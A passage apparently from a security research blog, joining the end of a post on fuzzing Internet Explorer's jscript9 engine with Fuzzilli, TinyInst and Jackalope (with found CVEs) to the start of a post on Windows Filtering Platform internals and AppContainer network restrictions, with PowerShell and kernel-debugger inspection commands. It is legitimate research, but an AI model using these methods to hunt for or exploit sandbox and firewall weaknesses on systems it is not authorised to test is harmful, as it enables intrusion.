Another feature that didn’t make it to Swift for Windows is statically linking libraries. This means that all libraries (such as those written in C and C++ that the user wants to include in their Swift project) need to be dynamically linked. This goes for libraries already included in the Fuzzilli project, but also for TinyInst. Since TinyInst also uses the CMake build system, my first attempt at integrating TinyInst was to include it via the Fuzzilli CMake project, and simply have it built as a shared library. However, the same tooling that was successful in building Fuzzilli would fail to build TinyInst (probably due to various platform libraries TinyInst uses). That’s why, in the end, TinyInst was being built separately into a .dll and this .dll loaded “manually” into Fuzzilli via the LoadLibrary API. This turned out not to be so bad - Swift build tooling for Windows was quite slow, and so it was much faster to only build TinyInst when needed, rather than build the entire Fuzzilli project (even when the changes made were minor).

The Linux/macOS parts of Fuzzilli, of course, also needed to be rewritten. Fortunately, it turned out that the parts that needed to be rewritten were the parts written in C, and the parts written in Swift worked as-is (other than a couple of exceptions, mostly related to networking). As someone with no previous experience with Swift, this was quite a relief. The main parts that needed to be rewritten were the networking library (libsocket), the library used to run and monitor the child process (libreprl) and the library for collecting coverage (libcoverage). The latter two were changed to use TinyInst. Since these are separate libraries in Fuzzilli, but TinyInst handles both of these tasks, some plumbing through Swift code was needed to make sure both of these libraries talk to the same TinyInst instance for a given target.

Challenge 2: Threading woes

Another feature that made the integration less straightforward than hoped for was the use of threading in Swift. TinyInst is built on a custom debugger and, on Windows, it uses the Windows debugging API. One specific feature of the Windows debugging API, for example WaitForDebugEvent, is that it does not take a debugee pid or a process handle as an argument. So then, the question is, if you have multiple debugees, to which of them does the API call refer? The answer to that is, when a debugger on Windows attaches to a debugee (or starts a debugee process), the thread  that started/attached it is the debugger. Any subsequent calls for that particular debugee need to be issued on that same thread.

In contrast, the preferred Swift coding style (that Fuzzilli also uses) is to take advantage of threading primitives such as DispatchQueue. When tasks get posted on a DispatchQueue, they can run in parallel on “background” threads. However, with the background threads, there is no guarantee that a certain task is always going to run on the same thread. So it would happen that calls to the same TinyInst instance happened from different threads, thus breaking the Windows debugging model. This is why, for the purposes of this project, TinyInst was modified to create its own thread (one for each target process) and ensure that any debugger calls for a particular child process always happen on that thread.

Various minor changes

Some examples of features Fuzzilli requires that needed to be added to TinyInst are stdin/stdout redirection and a channel for reading out the “status” of JavaScript execution (specifically, to be able to tell if JavaScript code was throwing an exception or executing successfully). Some of these features were already integrated into the “mainline” TinyInst or will be integrated in the future.

After all of that was completed though, the Fuzzilli/Tinyinst hybrid was running in a stable manner:

Note that coverage percentage reported by Fuzzilli is incorrect. Because TinyInst is a dynamic instrumentation library, it cannot know the number of basic blocks/edges in advance.

Primarily because of the current Swift on Windows issues, this closed-source mode of Fuzzilli is not something we want to officially support. However, the sources and the build we used can be downloaded here.

Approach 2: Grammar-based mutation fuzzing with Jackalope

Jackalope is a coverage-guided fuzzer I developed for fuzzing black-box binaries on Windows and, recently, macOS. Jackalope initially included mutators suitable for fuzzing of binary formats. However, a key feature of Jackalope is modularity: it is meant to be easy to plug in or replace individual components, including, but not limited to, sample mutators.

After observing how Fuzzilli works more closely during Approach 1, as well as observing samples it generated and the bugs it found, the idea was to extend Jackalope to allow mutational JavaScript fuzzing, but also in the future, mutational fuzzing of other targets whose samples can be described by a context-free grammar.

Jackalope uses a grammar syntax similar to that of Domato, but somewhat simplified (with some features not supported at this time). This grammar format is easy to write and easy to modify (but also easy to parse). The grammar syntax, as well as the list of builtin symbols, can be found on this page and the JavaScript grammar used in this project can be found here.

One addition to the Domato grammar syntax that allows for more natural mutations, but also sample minimization, are the <repeat_*> grammar nodes. A <repeat_x> symbol tells the grammar engine that it can be represented as zero or more <x> nodes. For example, in our JavaScript grammar, we have

<statementlist> = <repeat_statement>

telling the grammar engine that <statementlist> can be constructed by concatenating zero or more <statement>s. In our JavaScript grammar, a <statement> expands to an actual JavaScript statement. This helps the mutation engine in the following way: it now knows it can mutate a sample by inserting another <statement> node anywhere in the <statementlist> node. It can also remove <statement> nodes from the <statementlist> node. Both of these operations will keep the sample valid (in the grammar sense).

It’s not mandatory to have <repeat_*> nodes in the grammar, as the mutation engine knows how to mutate other nodes as well (see the list of mutations below). However, including them where it makes sense might help make mutations in a more natural way, as is the case of the JavaScript grammar.

Internally, grammar-based mutation works by keeping a tree representation of the sample instead of representing the sample just as an array of bytes (Jackalope must in fact represent a grammar sample as a sequence of bytes at some points in time, e.g when storing it to disk, but does so by serializing the tree and deserializing when needed). Mutations work by modifying a part of the tree in a manner that ensures the resulting tree is still valid within the context of the input grammar. Minimization works by removing those nodes that are determined to be unnecessary.

Jackalope’s mutation engine can currently perform the following operations on the tree:

  • Generate a new tree from scratch. This is not really a mutation and is mainly used to bootstrap the fuzzers when no input samples are provided. In fact, grammar fuzzing mode in Jackalope must either start with an empty corpus or a corpus generated by a previous session. This is because there is currently no way to parse a text file (e.g. a JavaScript source file) into its grammar tree representation (in general, there is no guaranteed unique way to parse a sample with a context-free grammar).
  • Select a random node in the sample's tree representation. Generate just this node anew while keeping the rest of the tree unchanged.
  • Splice: Select a random node from the current sample and a node with the same symbol from another sample. Replace the node in the current sample with a node from the other sample.
  • Repeat node mutation: One or more new children get added to a <repeat_*> node, or some of the existing children get replaced.
  • Repeat splice: Selects a <repeat_*> node from the current sample and a similar <repeat_*> node from another sample. Mixes children from the other node into the current node.

JavaScript grammar was initially constructed by following  the ECMAScript 2022 specification. However, as always when constructing fuzzing grammars from specifications or in a (semi)automated way, this grammar was only a starting point. More manual work was needed to make the grammar output valid and generate interesting samples more frequently.

Jackalope now supports grammar fuzzing out-of-the box, and, in order to use it, you just need to add -grammar <path_to_grammar_file> to Jackalope’s command lines. In addition to running against closed-source targets on Windows and macOS, Jackalope can now run against open-source targets on Linux using Sanitizer Coverage based instrumentation. This is to allow experimentation with grammar-based mutation fuzzing on open-source software.

The following image shows Jackalope running against jscript9.

Jackalope running against jscript9.

Results

I ran Fuzzilli for several weeks on 100 cores. This resulted in finding two vulnerabilities, CVE-2021-26419 and CVE-2021-31959. Note that the bugs that were analyzed and determined not to have security impact are not counted here. Both of the vulnerabilities found were in the bytecode generator, a part of the JavaScript engine that is typically not very well tested by generation-based fuzzing approaches. Both of these bugs were found relatively early in the fuzzing process and would be findable even by fuzzing on a single machine.

The second of the two bugs was particularly interesting because it initially manifested only as a NULL pointer dereference that happened occasionally, and it took quite a bit of effort (including tracing JavaScript interpreter execution in cases where it crashed and in cases where it didn’t to see where the execution flow diverges) to reach the root cause. Time travel debugging was also useful here - it would be quite difficult if not impossible to analyze the sample without it. The reader is referred to the vulnerability report for further details about the issue.

Jackalope was run on a similar setup: for several weeks on 100 cores. Interestingly, at least against jscript9, Jackalope with grammar-based mutations behaved quite similarly to Fuzzilli: it was hitting a similar level of coverage and finding similar bugs. It also found CVE-2021-26419 quickly into the fuzzing process. Of course, it’s easy to re-discover bugs once they have already been found with another tool, but neither the grammar engine nor the JavaScript grammar contain anything specifically meant for finding these bugs.

About a week and a half into fuzzing with Jackalope, it triggered a bug I hadn't seen before, CVE-2021-34480. This time, the bug was in the JIT compiler, which is another component not exercised very well with generation-based approaches. I was quite happy with this find, because it validated the feasibility of a grammar-based approach for finding JIT bugs.

Limitations and improvement ideas

While successful coverage-guided fuzzing of closed-source JavaScript engines is certainly possible as demonstrated above, it does have its limitations. The biggest one is inability to compile the target with additional debug checks. Most of the modern open-source JavaScript engines include additional checks that can be compiled in if needed, and enable catching certain types of bugs more easily, without requiring that the bug crashes the target process. If jscript9 source code included such checks, they are lost in the release build we fuzzed.

Related to this, we also can’t compile the target with something like Address Sanitizer. The usual workaround for this on Windows would be to enable Page Heap for the target. However, it does not work well here. The reason is, jscript9 uses a custom allocator for JavaScript objects. As Page Heap works by replacing the default malloc(), it simply does not apply here.

A way to get around this would be to use instrumentation (TinyInst is already a general-purpose instrumentation library so it could be used for this in addition to code coverage) to instrument the allocator and either insert additional checks or replace it completely. However, doing this was out-of-scope for this project.

Conclusion

Coverage-guided fuzzing of closed-source targets, even complex ones such as JavaScript engines is certainly possible, and there are plenty of tools and approaches available to accomplish this.

In the context of this project, Jackalope fuzzer was extended to allow grammar-based mutation fuzzing. These extensions have potential to be useful beyond just JavaScript fuzzing and can be adapted to other targets by simply using a different input grammar. It would be interesting to see which other targets the broader community could think of that would benefit from a mutation-based approach.

Finally, despite being targeted by security researchers for a long time now, Internet Explorer still has many exploitable bugs that can be found even without large resources. After the development on this project was complete, Microsoft announced that they will be removing Internet Explorer as a separate browser. This is a good first step, but with Internet Explorer (or Internet Explorer engine) integrated into various other products (most notably, Microsoft Office, as also exploited by in-the-wild attackers), I wonder how long it will truly take before attackers stop abusing it.

Understanding Network Access in Windows AppContainers

Posted by James Forshaw, Project Zero

Recently I've been delving into the inner workings of the Windows Firewall. This is interesting to me as it's used to enforce various restrictions such as whether AppContainer sandboxed applications can access the network. Being able to bypass network restrictions in AppContainer sandboxes is interesting as it expands the attack surface available to the application, such as being able to access services on localhost, as well as granting access to intranet resources in an Enterprise.

I recently discovered a configuration issue with the Windows Firewall which allowed the restrictions to be bypassed and allowed an AppContainer process to access the network. Unfortunately Microsoft decided it didn't meet the bar for a security bulletin so it's marked as WontFix.

As the mechanism that the Windows Firewall uses to restrict access to the network from an AppContainer isn't officially documented as far as I know, I'll provide the details on how the restrictions are implemented. This will provide the background to understanding why my configuration issue allowed for network access.

I'll also take the opportunity to give an overview of how the Windows Firewall functions and how you can use some of my tooling to inspect the current firewall configuration. This will provide security researchers with the information they need to better understand the firewall and assess its configuration to find other security issues similar to the one I reported. At the same time I'll note some interesting quirks in the implementation which you might find useful.

Windows Firewall Architecture Primer

Before we can understand how network access is controlled in an AppContainer we need to understand how the built-in Windows firewall functions. Prior to XP SP2 Windows didn't have a built-in firewall, and you would typically install a third-party firewall such as ZoneAlarm. These firewalls were implemented by hooking into Network Driver Interface Specification (NDIS) drivers or implementing user-mode Winsock Service Providers but this was complex and error prone.

While XP SP2 introduced the built-in firewall, the basis for the one used in modern versions of Windows was introduced in Vista as the Windows Filtering Platform (WFP). However, as a user you wouldn't typically interact directly with WFP. Instead you'd use a firewall product which exposes a user interface, and then configures WFP to do the actual firewalling. On a default installation of Windows this would be the Windows Defender Firewall. If you installed a third-party firewall this would replace the Defender component but the actual firewall would still be implemented through configuring WFP.

Architectural diagram of the built-in Windows Firewall. Showing a separation between user components (MPSSVC, BFE) and the kernel components (AFD, TCP/IP, NETIO and Callout Drivers)

The diagram gives an overview of how various components in the OS are connected together to implement the firewall. A user would interact with the Windows Defender firewall using the GUI, or a command line interface such as PowerShell's NetSecurity module. This interface communicates with the Windows Defender Firewall Service (MPSSVC) over RPC to query and modify the firewall rules.

MPSSVC converts its ruleset to the lower-level WFP firewall filters and sends them over RPC to the Base Filtering Engine (BFE) service. These filters are then uploaded to the TCP/IP driver (TCPIP.SYS) in the kernel which is where the firewall processing is handled. The device objects (such as \Device\WFP) which the TCP/IP driver exposes are secured so that only the BFE service can access them. This means all access to the kernel firewall needs to be mediated through the service.

When an application, such as a Web Browser, creates a new network socket the AFD driver responsible for managing sockets will communicate with the TCP/IP driver to configure the socket for IP. At this point the TCP/IP driver will capture the security context of the creating process and store that for later use by the firewall. When an operation is performed on the socket, such as making or accepting a new connection, the firewall filters will be evaluated.

The evaluation is handled primarily by the NETIO driver as well as registered callout drivers. These callout drivers allow for more complex firewall rules to be implemented as well as inspecting and modifying network traffic. The drivers can also forward checks to user-mode services. As an example, the ability to forward checks to user mode allows the Windows Defender Firewall to display a UI when an unknown application listens on a wildcard address, as shown below.

Dialog displayed by the Windows Firewall service when an unknown application tries to listen for incoming connections.

The end result of the evaluation is whether the operation is permitted or blocked. The behavior of a block depends on the operation. If an outbound connection is blocked the caller is notified. If an inbound connection is blocked the firewall will drop the packets and provide no notification to the peer, such as a TCP Reset or ICMP response. This default drop behavior can be changed through a system wide configuration change. Let's dig into more detail on how the rules are configured for evaluation.

Layers, Sublayers and Filters

The firewall rules are configured using three types of object: layers, sublayers and filters as shown in the following diagram.

Diagram showing the relationship between layers, sublayers and filters. Each layer can have one or more sublayers which in turn has one or more associated filters.

The firewall layer is used to categorize the network operation to be evaluated. For example there are separate layers for inbound and outbound packets. This is typically further differentiated by IP version, so there are separate IPv4 and IPv6 layers for inbound and outbound packets. While the firewall is primarily focussed on IP traffic there does exist limited MAC and Virtual Switch layers to perform specialist firewalling operations. You can find the list of pre-defined layers on MSDN here. As the WFP needs to know what layer handles which operation there's no way for additional layers to be added to the system by a third-party application.

When a packet is evaluated by a layer the WFP performs Filter Arbitration. This is a set of rules which determine the order of evaluation of the filters. First WFP enumerates all registered filters which are associated with the layer's unique GUID. Next, WFP groups the filters by their sublayer's GUID and orders the filter groupings by a weight value which was specified when the sublayer was registered. Finally, WFP evaluates each filter according to the order based on a weight value specified when the filter was registered.

For every filter, WFP checks if the list of conditions match the packet and its associated meta-data. If the conditions match then the filter performs a specified action, which can be one of the following:

  • Permit
  • Block
  • Callout Terminating
  • Callout Unknown
  • Callout Inspection

If the action is Permit or Block then the filter evaluation for the current sublayer is terminated with that action as the result. If the action is a callout then WFP will invoke the filter's registered callout driver's classify function to perform additional checks. The classify function can evaluate the packet and its meta-data and specify a final result of Permit, Block or additionally Continue which indicates the filter should be ignored. In general if the action is Callout Terminating then it should only set Permit and Block, and if it's Callout Inspection then it should only set Continue. The Callout Unknown action is for callouts which might terminate or might not depending on the result of the classification.

Once a terminating filter has been evaluated WFP stops processing that sublayer. However, WFP will continue to process the remaining sublayers in the same way regardless of the final result. In general if any sublayer returns a Block result then the packet will be blocked, otherwise it'll be permitted. This means that if a higher priority sublayer's result is Permit, it can still be blocked by a lower-priority sublayer.

A filter can be configured with the FWPM_FILTER_FLAG_CLEAR_ACTION_RIGHT flag which indicates that the result should be considered “hard” allowing a higher priority filter to permit a packet which can't be overridden by a lower-priority blocking filter. The rules for the final result are even more complex than I make out including soft blocks and vetos, refer to the page in MSDN for more information.

 

To simplify the classification of network traffic, WFP provides a set of stateful layers which correspond to major network events such as TCP connection and port binding. The stateful filtering is referred to as Application Layer Enforcement (ALE). For example the FWPM_LAYER_ALE_AUTH_CONNECT_V4 layer will be evaluated when a TCP connection using IPv4 is being made.

For any given connection it will only be evaluated once, not for every packet associated with the TCP connection handshake. In general these ALE layers are the ones we'll focus on when inspecting the firewall configuration, as they're the most commonly used. The three main ALE layers you're going to need to inspect are the following:

Name

Description

FWPM_LAYER_ALE_AUTH_CONNECT_V4/6

Processed when TCP connect() called.

FWPM_LAYER_ALE_AUTH_LISTEN_V4/6

Processed when TCP listen() called.

FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4/6

Processed when a packet/connection is received.

What layers are used and in what order they are evaluated depend on the specific operation being performed. You can find the list of the layers for TCP packets here and UDP packets here. Now, let's dig into how filter conditions are defined and what information they can check.

Filter Conditions

Each filter contains an optional list of conditions which are used to match a packet. If no list is specified then the filter will always match any incoming packet and perform its defined action. If more than one condition is specified then the filter is only matched if all of the conditions match. If you have multiple conditions of the same type they're OR'ed together, which allows a single filter to match on multiple values.

Each condition contains three values:

  • The layer field to check.
  • The value to compare against.
  • The match type, for example the packet value and the condition value are equal.

Each layer has a list of fields that will be populated whenever a filter's conditions are checked. The field might directly reflect a value from the packet, such as the destination IP address or the interface the packet is traversing. Or it could be a metadata value, such as the user identity of the process which created the socket. Some common fields are as follows:

Field Type

Description

FWPM_CONDITION_IP_REMOTE_ADDRESS

The remote IP address.

FWPM_CONDITION_IP_LOCAL_ADDRESS

The local IP address.

FWPM_CONDITION_IP_PROTOCOL

The IP protocol type, e.g. TCP or UDP

FWPM_CONDITION_IP_REMOTE_PORT

The remote protocol port.

FWPM_CONDITION_IP_LOCAL_PORT

The local protocol port.

FWPM_CONDITION_ALE_USER_ID

The user's identity.

FWPM_CONDITION_ALE_REMOTE_USER_ID

The remote user's identity.

FWPM_CONDITION_ALE_APP_ID

The path to the socket's executable.

FWPM_CONDITION_ALE_PACKAGE_ID

The user's AppContainer package SID.

FWPM_CONDITION_FLAGS

A set of additional flags.

FWPM_CONDITION_ORIGINAL_PROFILE_ID

The source network interface profile.

FWPM_CONDITION_CURRENT_PROFILE_ID

The current network interface profile.

The value to compare against the field can take different values depending on the field being checked. For example the field FWPM_CONDITION_IP_REMOTE_ADDRESS can be compared to IPv4 or IPv6 addresses depending on the layer it's used in. The value can also be a range, allowing a filter to match on an IP address within a bounded set of addresses.

The FWPM_CONDITION_ALE_USER_ID and FWPM_CONDITION_ALE_PACKAGE_ID conditions are based on the access token captured when creating the TCP or UDP socket. The FWPM_CONDITION_ALE_USER_ID stores a security descriptor which is used with an access check with the creator's token. If the token is granted access then the condition is considered to match. For FWPM_CONDITION_ALE_PACKAGE_ID the condition checks the package SID of the AppContainer token. If the token is not an AppContainer then the filtering engine sets the package SID to the NULL SID (S-1-0-0).

The FWPM_CONDITION_ALE_REMOTE_USER_ID is similar to the FWPM_CONDITION_ALE_USER_ID condition but compares against the remote authenticated user. In most cases sockets are not authenticated, however if IPsec is in use that can result in a remote user token being available to compare. It's also used in some higher-level layers such as RPC filters.

The match type can be one of the following:

  • FWP_MATCH_EQUAL
  • FWP_MATCH_EQUAL_CASE_INSENSITIVE
  • FWP_MATCH_FLAGS_ALL_SET
  • FWP_MATCH_FLAGS_ANY_SET
  • FWP_MATCH_FLAGS_NONE_SET
  • FWP_MATCH_GREATER
  • FWP_MATCH_GREATER_OR_EQUAL
  • FWP_MATCH_LESS
  • FWP_MATCH_LESS_OR_EQUAL
  • FWP_MATCH_NOT_EQUAL
  • FWP_MATCH_NOT_PREFIX
  • FWP_MATCH_PREFIX
  • FWP_MATCH_RANGE

The match types should hopefully be self explanatory based on their names. How the match is interpreted depends on the field's type and the value being used to check against.

Inspecting the Firewall Configuration

We now have an idea of the basics of how WFP works to filter network traffic. Let's look at how to inspect the current configuration. We can't use any of the normal firewall commands or UIs such as the PowerShell NetSecurity module as I already mentioned these represent the Windows Defender view of the firewall.

Instead we need to use the RPC APIs BFE exposes to access the configuration, for example you can access a filter using the FwpmFilterGetByKey0 API. Note that the BFE maintains security descriptors to restrict access to WFP objects. By default nothing can be accessed by non-administrators, therefore you'd need to call the RPC APIs while running as an administrator.

You could implement your own tooling to call all the different APIs, but it'd be much easier if someone had already done it for us. For built-in tools the only one I know of is using netsh with the wfp namespace. For example to dump all the currently configured filters you can use the following command as an administrator:

PS> netsh wfp show filters file = -

This will print all filters in an XML format to the console. Be prepared to wait a while for the output to complete. You can also dump straight to a file. Of course you now need to interpret the XML results. It is possible to also specify certain parameters, such as local and remote addresses to reduce the output to only matching filters.

Processing an XML file doesn't sound too appealing. To make the firewall configuration easier to inspect I've added many of the BFE APIs to my NtObjectManager PowerShell module from version 1.1.32 onwards. The module exposes various commands which will return objects representing the current WFP configuration which you can easily use to inspect and group the results however you see fit.

Layer Configuration

Even though the layers are predefined in the WFP implementation it's still useful to be able to query the details about them. For this you can use the Get-FwLayer command.

PS> Get-FwLayer

KeyName                           Name                                    

-------                           ----                                    

FWPM_LAYER_OUTBOUND_IPPACKET_V6   Outbound IP Packet v6 Layer            

FWPM_LAYER_IPFORWARD_V4_DISCARD   IP Forward v4 Discard Layer            

FWPM_LAYER_ALE_AUTH_LISTEN_V4     ALE Listen v4 Layer

...

The output shows the SDK name for the layer, if it has one, and the name of the layer that the BFE service has configured. The layer can be queried by its SDK name, its GUID or a numeric ID, which we will come back to later. As we mostly only care about the ALE layers then there's a special AleLayer parameter to query a specific layer without needing to remember the full name or ID.

PS> (Get-FwLayer -AleLayer ConnectV4).Fields

KeyName                          Type      DataType              

-------                          ----      --------              

FWPM_CONDITION_ALE_APP_ID        RawData   ByteBlob              

FWPM_CONDITION_ALE_USER_ID       RawData   TokenAccessInformation

FWPM_CONDITION_IP_LOCAL_ADDRESS  IPAddress UInt32                

...

Each layer exposes the list of fields which represent the conditions which can be checked in that layer, you can access the list through the Fields property. The output shown above contains a few of the condition types we saw earlier in the table of conditions. The output also shows the type of the condition and the data type you should provide when filtering on that condition.

PS> Get-FwSubLayer | Sort-Object Weight | Select KeyName, Weight

KeyName                                   Weight

-------                                   ------

FWPM_SUBLAYER_INSPECTION                       0

FWPM_SUBLAYER_TEREDO                           1

MICROSOFT_DEFENDER_SUBLAYER_FIREWALL           2

MICROSOFT_DEFENDER_SUBLAYER_WSH                3

MICROSOFT_DEFENDER_SUBLAYER_QUARANTINE         4            

...

You can also inspect the sublayers in the same way, using the Get-FwSubLayer command as shown above. The most useful information from the sublayer is the weight. As mentioned earlier this is used to determine the ordering of the associated filters. However, as we'll see you rarely need to query the weight yourself.

Filter Configuration

Enforcing the firewall rules is up to the filters. You can enumerate all filters using the Get-FwFilter command.

PS> Get-FwFilter

FilterId ActionType Name

-------- ---------- ----

68071    Block     Boot Time Filter

71199    Permit    @FirewallAPI.dll,-80201

71350    Block     Block inbound traffic to dmcertinst.exe

...

The default output shows the ID of a filter, the action type and the user defined name. The filter objects returned also contain the layer and sublayer identifiers as well as the list of matching conditions for the filter. As inspecting the filter is going to be the most common operation the module provides the Format-FwFilter command to format a filter object in a more readable format.

PS> Get-FwFilter -Id 71350 | Format-FwFilter

Name       : Block inbound traffic to dmcertinst.exe

Action Type: Block

Key        : c391b53a-1b98-491c-9973-d86e23ea8a84

Id         : 71350

Description:

Layer      : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : Indexed

Weight     : 549755813888

Conditions :

FieldKeyName              MatchType Value

------------              --------- -----

FWPM_CONDITION_ALE_APP_ID Equal    

\device\harddiskvolume3\windows\system32\dmcertinst.exe

The formatted output contains the layer and sublayer information, the assigned weight of the filter and the list of conditions. The layer is FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4 which handles new incoming connections. The sublayer is MICROSOFT_DEFENDER_SUBLAYER_WSH which is used to group Windows Service Hardening rules which apply regardless of the normal firewall configuration.

In this example the filter only matches on the socket creator process executable's path. The end result if the filter matches the current state is for the IPv4 TCP network connection to be blocked at the MICROSOFT_DEFENDER_SUBLAYER_WSH sublayer. As already mentioned it now won't matter if a lower priority layer would permit the connection if the block is enforced.

How can we determine the ordering of sublayers and filters? You could manually extract the weights for each sublayer and filter and try and order them, and hopefully the ordering you come up with matches what WFP uses. A much simpler approach is to specify a flag when enumerating filters for a particular layer to request the BFE APIs sort the filters using the canonical ordering.

PS> Get-FwFilter -AleLayer ConnectV4 -Sorted

FilterId ActionType     Name

-------- ----------     ----

65888    Permit         Interface Un-quarantine filter

66469    Block          AppContainerLoopback

66467    Permit         AppContainerLoopback

66473    Block          AppContainerLoopback

...

The Sorted parameter specifies the flag to sort the filters. You can now go through the list of filters in order and try and work out what would be the matched filter based on some criteria you decide on. Again it'd be helpful if we could get the BFE service to do more of the hard work in figuring out what rules would apply given a particular process. For this we can specify some of the metadata that represents the connection being made and get the BFE service to only return filters which match on their conditions.

PS> $template = New-FwFilterTemplate -AleLayer ConnectV4 -Sorted

PS> $fs = Get-FwFilter -Template $template

PS> $fs.Count

65

PS> Add-FwCondition $template -ProcessId $pid

PS> $addr = Resolve-DnsName "www.google.com" -Type A

PS> Add-FwCondition $template -IPAddress $addr.Address -Port 80

PS> Add-FwCondition $template -ProtocolType Tcp

PS> Add-FwCondition $template -ConditionFlags 0

PS> $template.Conditions

FieldKeyName                     MatchType Value                                                                    

------------                     --------- -----                                                                    

FWPM_CONDITION_ALE_APP_ID        Equal     \device\harddisk...

FWPM_CONDITION_ALE_USER_ID       Equal     FirewallTokenInformation                        

FWPM_CONDITION_ALE_PACKAGE_ID    Equal     S-1-0-0

FWPM_CONDITION_IP_REMOTE_ADDRESS Equal     142.250.72.196

FWPM_CONDITION_IP_REMOTE_PORT    Equal     80

FWPM_CONDITION_IP_PROTOCOL       Equal     Tcp

FWPM_CONDITION_FLAGS             Equal     None

PS> $fs = Get-FwFilter -Template $template

PS> $fs.Count

2

To specify the metadata we need to create an enumeration template using the New-FwFilterTemplate command. We specify the Connect IPv4 layer as well as requesting that the results are sorted. Using this template with the Get-FwFilter command returns 65 results (on my machine).

Next we add some metadata, first from the current powershell process. This populates the App ID with the executable path as well as token information such as the user ID and package ID of an AppContainer. We then add details about the target connection request, specifying a TCP connection to www.google.com on port 80. Finally we add some condition flags, we'll come back to these flags later.

Using this new template results in only 2 filters whose conditions will match the metadata. Of course depending on your current configuration the number might be different. In this case 2 filters is much easier to understand than 65. If we format those two filter we see the following:

PS> $fs | Format-FwFilter

Name       : Default Outbound

Action Type: Permit

Key        : 07ba2a96-0364-4759-966d-155007bde926

Id         : 67989

Description: Default Outbound

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_FIREWALL

Flags      : None

Weight     : 9223372036854783936

Conditions :

FieldKeyName                       MatchType Value

------------                       --------- -----

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Public    

FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Public

Name       : Default Outbound

Action Type: Permit

Key        : 36da9a47-b57d-434e-9345-0e36809e3f6a

Id         : 67993

Description: Default Outbound

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_FIREWALL

Flags      : None

Weight     : 3458764513820540928

Both of the two filters permit the connection and based on the name they're the default backstop when no other filters match. It's possible to configure each network profile with different default backstops. In this case the default is to permit outbound traffic. We have two of them because both match all the metadata we provided, although if we'd specified a profile other than Public then we'd only get a single filter.

Can we prove that this is the filter which matches a TCP connection? Fortunately we can: WFP supports gathering network events related to the firewall. An event includes the filter which permitted or denied the network request, and we can then compare it to our two filters to see if one of them matched. You can use the Get-FwNetEvent command to read the current circular buffer of events.

PS> Set-FwEngineOption -NetEventMatchAnyKeywords ClassifyAllow

PS> $s = [System.Net.Sockets.TcpClient]::new($addr.IPAddress, 80)

PS> Set-FwEngineOption -NetEventMatchAnyKeywords None

PS> $ev_temp = New-FwNetEventTemplate -Condition $template.Conditions

PS> Add-FwCondition $ev_temp -NetEventType ClassifyAllow

PS> Get-FwNetEvent -Template $ev_temp | Format-List

FilterId        : 67989

LayerId         : 48

ReauthReason    : 0

OriginalProfile : Public

CurrentProfile  : Public

MsFwpDirection  : 0

IsLoopback      : False

Type            : ClassifyAllow

Flags           : IpProtocolSet, LocalAddrSet, RemoteAddrSet, ...

Timestamp       : 8/5/2021 11:24:41 AM

IPProtocol      : Tcp

LocalEndpoint   : 10.0.0.101:63046

RemoteEndpoint  : 142.250.72.196:80

ScopeId         : 0

AppId           : \device\harddiskvolume3\windows\system32\wind...

UserId          : S-1-5-21-4266194842-3460360287-487498758-1103

AddressFamily   : Inet

PackageSid      : S-1-0-0

First we enable the ClassifyAllow event, which is generated when a firewall event is permitted. By default only firewall blocks are recorded using the ClassifyDrop event to avoid filling the small network event log with too much data. Next we make a connection to the Google web server we queried earlier to generate an event. We then disable the ClassifyAllow events again to reduce the risk we'll lose the event.

Next we can query for the current stored events using Get-FwNetEvent. To limit the network events returned to us we can specify a template in a similar way to when we queried for filters. In this case we create a new template using the New-FwNetEventTemplate command and copy the existing conditions from our filter template. We then add a condition to match on only ClassifyAllow events.

Formatting the results we can see the network connection event to TCP port 80. Crucially if you compare the FilterId value to the Id fields in the two enumerated filters we match the first filter. This gives us confidence that we have a basic understanding of how the filtering works. Let's move on to running some tests to determine how the AppContainer network restrictions are implemented through WFP.

Worth noting at this point that because the network event buffer can be small, of the order of 30-40 events depending on load, it's possible on a busy server that events might be lost before you query for them. You can get a real-time trace of events by using the Start-FwNetEventListener command to avoid losing events.

Callout Drivers

As mentioned a developer can implement their own custom functionality to inspect and modify network traffic. This functionality is used by various different products, ranging from AV to scan your network traffic for badness to NMAP's NPCAP capturing loopback traffic.

To set up a callout the developer needs to do two things. First they need to register its callback functions for the callout using the FwpmCalloutRegister API in the kernel driver. Second they need to create a filter to use the callout by specifying the providerContextKey GUID and one of the action types which invoke a callout.

You can query the list of registered callouts using the FwpmCalloutEnum0 API in user-mode. I expose this API through the Get-FwCallout command.

PS> Get-FwCallout | Sort CalloutId | Select CalloutId, KeyName

CalloutId KeyName

--------- -------

        1 FWPM_CALLOUT_IPSEC_INBOUND_TRANSPORT_V4

        2 FWPM_CALLOUT_IPSEC_INBOUND_TRANSPORT_V6

        3 FWPM_CALLOUT_IPSEC_OUTBOUND_TRANSPORT_V4

        4 FWPM_CALLOUT_IPSEC_OUTBOUND_TRANSPORT_V6

        5 FWPM_CALLOUT_IPSEC_INBOUND_TUNNEL_V4

        6 FWPM_CALLOUT_IPSEC_INBOUND_TUNNEL_V6

...

The above output shows the callouts listed by their callout ID numbers. The ID number is key to finding the callback functions in the kernel. There doesn't seem to be a way of enumerating the addresses of callout functions directly (at least from user mode). This article shows a basic approach to extract the callback functions using a kernel debugger, although it's a little out of date.

The NETIO driver stores all registered callbacks in a large array, the index being the callout ID. If you want to find a specific callout then find the base of the array using the description in the article then just calculate the offset based on a single callout structure and the index. For example on Windows 10 21H1 x64 the following command will dump a callout's classify callback function. Replace N with the callout ID, the magic numbers 198 and 50 are the offset into the gWfpGlobal global data table and the size of a callout entry which you can discover through analyzing the code.

0: kd> ln poi(poi(poi(NETIO!gWfpGlobal)+198)+(50*N)+10)

If you're in kernel mode there's an undocumented KfdGetRefCallout function (and a corresponding KfdDeRefCallout to decrement the reference) exported by NETIO which will return a pointer to the internal callout structure based on the ID avoiding the need to extract the offsets from disassembly.

AppContainer Network Restrictions

The basics of accessing the network from an AppContainer sandbox is documented by Microsoft. Specifically the lowbox token used for the sandbox needs to have one or more capabilities enabled to grant access to the network. The three capabilities are:

  • internetClient - Grants client access to the Internet
  • internetClientServer - Grants client and server access to the Internet
